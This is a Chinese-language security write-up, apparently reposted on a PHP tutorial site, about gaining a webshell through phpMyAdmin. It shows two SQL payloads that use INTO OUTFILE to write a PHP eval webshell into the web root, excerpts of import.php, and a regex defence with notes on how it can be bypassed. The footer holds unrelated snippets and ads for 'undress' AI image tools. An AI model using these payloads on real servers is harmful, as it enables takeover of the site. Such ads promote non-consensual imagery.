目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接
目录
<span>1</span><span>. 漏洞描述 </span><span>2</span><span>. 漏洞触发条件 </span><span>3</span><span>. 漏洞影响范围 </span><span>4</span><span>. 漏洞代码分析 </span><span>5</span><span>. 防御方法 </span><span>6</span>. 攻防思考
1. 漏洞描述
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性
2. 漏洞触发条件
<span>1</span><span>. 已知phpmyadmin的root密码,即mysql的root密码(phpmyadmin只是通过web方式连接mysql的工具)
</span><span>1</span><span>) mysql本身默认的弱口令
</span><span>2</span><span>) 通过其他漏洞(例如注入)获得了mysql的root密码
</span><span>2</span><span>. 已知网站的物理路径
</span><span>1</span>) 在phpmyadmin的后台的<span>"</span><span>变量</span><span>"</span><span>tab页面,可以看到mysql的物理路径,从而推测出网站的物理路径
</span><span>2</span>) 通过其他web漏洞获得网站的物理路径
通过phpmyadmin进行getshell的核心就是通过sql进行文件写的操作,常见的sql如下
----<span>1</span>---<span> Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(</span><span>'</span><span><?php @eval($_POST[cmd])?></span><span>'</span><span>); </span><span>select</span> cmd <span>from</span> a into outfile <span>'</span><span> C:/htdocs/1.php</span><span>'</span><span>; Drop TABLE IF EXISTS a; DROP TABLE IF EXISTS `a`; </span>----<span>1</span>--- ----<span>2</span>--- <span>select</span> <span>'</span><span><?php @eval($_POST[pass]);?></span><span>'</span>INTO OUTFILE <span>'</span><span>d:/wamp/www/exehack.php</span><span>'</span> ----<span>2</span>---
Relevant Link:
http:<span>//</span><span>www.exehack.net/681.html</span> http:<span>//</span><span>www.exehack.net/99.html</span> http:<span>//</span><span>www.187299.com/archives/1695</span>
3. 漏洞影响范围
全部phpmyadmin版本
4. 漏洞代码分析
/phpMyAdmin/import.php
所有处理用户自定义SQL解析执行的逻辑都在这个PHP文件中实现
<span>/*</span><span>
this code point is important
$import_text is the one that need to be check strictly
</span><span>*/</span>
<span>if</span><span> ($go_sql)
{
</span><span>//</span><span> parse sql query</span>
include_once <span>'</span><span>libraries/parse_analyze.inc.php</span><span>'</span><span>;
</span><span>if</span> (isset($ajax_reload) && $ajax_reload[<span>'</span><span>reload</span><span>'</span>] === <span>true</span><span>)
{
$response </span>=<span> PMA_Response::getInstance();
$response</span>->addJSON(<span>'</span><span>ajax_reload</span><span>'</span><span>, $ajax_reload);
}
PMA_executeQueryAndSendQueryResponse(
$analyzed_sql_results, </span><span>false</span>, $db, $table, <span>null</span>, $import_text, <span>null</span><span>,
$analyzed_sql_results[</span><span>'</span><span>is_affected</span><span>'</span>], <span>null</span><span>,
</span><span>null</span>, <span>null</span>, <span>null</span>, $<span>goto</span>, $pmaThemeImage, <span>null</span>, <span>null</span>, <span>null</span><span>, $sql_query,
</span><span>null</span>, <span>null</span><span>
);
}
</span><span>else</span> <span>if</span><span> ($result)
{
</span><span>//</span><span> Save a Bookmark with more than one queries (if Bookmark label given).</span>
<span>if</span> (! empty($_POST[<span>'</span><span>bkm_label</span><span>'</span>]) && !<span> empty($import_text))
{
PMA_storeTheQueryAsBookmark(
$db, $GLOBALS[</span><span>'</span><span>cfg</span><span>'</span>][<span>'</span><span>Bookmark</span><span>'</span>][<span>'</span><span>user</span><span>'</span><span>],
$import_text, $_POST[</span><span>'</span><span>bkm_label</span><span>'</span><span>],
isset($_POST[</span><span>'</span><span>bkm_replace</span><span>'</span>]) ? $_POST[<span>'</span><span>bkm_replace</span><span>'</span>] : <span>null</span><span>
);
}
$response </span>=<span> PMA_Response::getInstance();
$response</span>->isSuccess(<span>true</span><span>);
$response</span>->addJSON(<span>'</span><span>message</span><span>'</span><span>, PMA_Message::success($msg));
$response</span>-><span>addJSON(
</span><span>'</span><span>sql_query</span><span>'</span><span>,
PMA_Util::getMessage($msg, $sql_query, </span><span>'</span><span>success</span><span>'</span><span>)
);
}
</span><span>else</span> <span>if</span> ($result == <span>false</span><span>)
{
$response </span>=<span> PMA_Response::getInstance();
$response</span>->isSuccess(<span>false</span><span>);
$response</span>->addJSON(<span>'</span><span>message</span><span>'</span><span>, PMA_Message::error($msg));
}
</span><span>else</span><span>
{
$active_page </span>= $<span>goto</span><span>;
include </span><span>''</span> . $<span>goto</span><span>;
}</span>
5. 防御方法
对变量$import_text进行恶意检查是我们针对phpmyadmin执行sql导出文件getshell攻击的防御思路
<span>if</span>(preg_match(<span>"</span><span>/select.*into.*(outfile|dumpfile)/sim</span><span>"</span><span>, $import_text, $matches))
{
echo </span><span>"</span><span>request error!</span><span>"</span> . <span>"</span><span></span><span>"</span> . $matches[<span>0</span><span>];
die();
} </span>
要特别注意的是,在使用PHP的正则匹配引擎的时候,需要考虑到换行场景下的bypass风险
还需要注意的,MYSQL存在很多扩展语法,例如
<span>1</span><span>. 定义存储过程 </span><span>2</span><span>. 定义函数 </span><span>3</span><span>. 定义触发器 </span><span>4</span><span>. 使用语法预处理编译 </span><span>/*</span><span> prepare stmt from 'select count(*) from information_schema.schemata'; 这里待编译的sql语句也可以进行字符变形以此进行bypass execute stmt; </span><span>*/</span>
Relevant Link:
http:<span>//</span><span>php.net/manual/en/function.preg-match.php#111573</span> http:<span>//</span><span>blog.sina.com.cn/s/blog_3fe961ae01013r8f.html</span>
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved
phpmyadmin怎么设置主键Apr 07, 2024 pm 02:54 PM表的主键是一列或多列,用于唯一标识表中每条记录。设置主键的步骤如下:登录 phpMyAdmin。选择数据库和表。勾选要作为主键的列。点击 "保存更改"。主键具有数据完整性、查找速度和关系建模方面的好处。
phpmyadmin怎么添加外键Apr 07, 2024 pm 02:36 PM在 phpMyAdmin 中添加外键可以通过以下步骤实现:选择包含外键的父表。编辑父表结构,在“列”中添加新列。启用外键约束,选择引用表和键。设置更新/删除操作。保存更改。
如何进行EyouCMS V1.5.1 前台getshell漏洞复现May 20, 2023 pm 08:14 PM0x00漏洞简介赞赞网络科技EyouCMS(易优CMS)是中国赞赞网络科技公司的一套基于ThinkPHP的开源内容管理系统(CMS)。Eyoucmsv1.5.1及以前版本存在任意用户后台登陆与文件包含漏洞,该漏洞使攻击者可以通过调用api,在前台设置一个管理员的session,后台远程插件下载文件包含getshell。0x01影响版本EyouCMS
phpmyadmin日志在哪里Apr 07, 2024 pm 12:57 PMPHPMyAdmin日志文件的默认位置:Linux/Unix/macOS:/var/log/phpmyadminWindows:C:\xampp\phpMyAdmin\logs\日志文件用途:故障排除审计安全性
phpmyadmin账号密码是什么Apr 07, 2024 pm 01:09 PMPHPMyAdmin 的默认用户名和密码为 root 和空。为了安全起见,建议更改默认密码。更改密码的方法:1. 登录 PHPMyAdmin;2. 选择 "privileges";3. 输入新密码并保存。忘记密码时,可通过停止 MySQL 服务并编辑配置文件的方式重置密码:1. 添加 skip-grant-tables 行;2. 登录 MySQL 命令行并重置 root 密码;3. 刷新权限表;4. 删除 skip-grant-tables 行,重启 MySQL 服务。
phpmyadmin怎么删除数据表Apr 07, 2024 pm 03:00 PMphpMyAdmin 中删除数据表的步骤:选择数据库和数据表;点击“操作”选项卡;选择“删除”选项;确认并执行删除操作。
为什么phpmyadmin拒绝访问Apr 07, 2024 pm 01:03 PMphpMyAdmin 拒绝访问的原因及解决方案:认证失败:检查用户名和密码是否正确。服务器配置错误:调整防火墙设置,检查数据库端口是否正确。权限问题:授予用户对数据库的访问权限。会话超时:刷新浏览器页面重新连接。phpMyAdmin 配置错误:检查配置文件和文件权限,确保启用了必需的 Apache 模块。服务器问题:等待一段时间后再重试或联系主机提供商。
phpmyadmin漏洞属于什么漏洞Apr 07, 2024 pm 01:36 PMphpMyAdmin 易受多种漏洞影响,包括:1. SQL 注入漏洞;2. 跨站点脚本 (XSS) 漏洞;3. 远程代码执行 (RCE) 漏洞;4. 本地文件包含 (LFI) 漏洞;5. 信息泄露漏洞;6. 权限提升漏洞。
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
Atom editor mac version download
The most popular open source editor
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
Dreamweaver Mac version
Visual web development tools
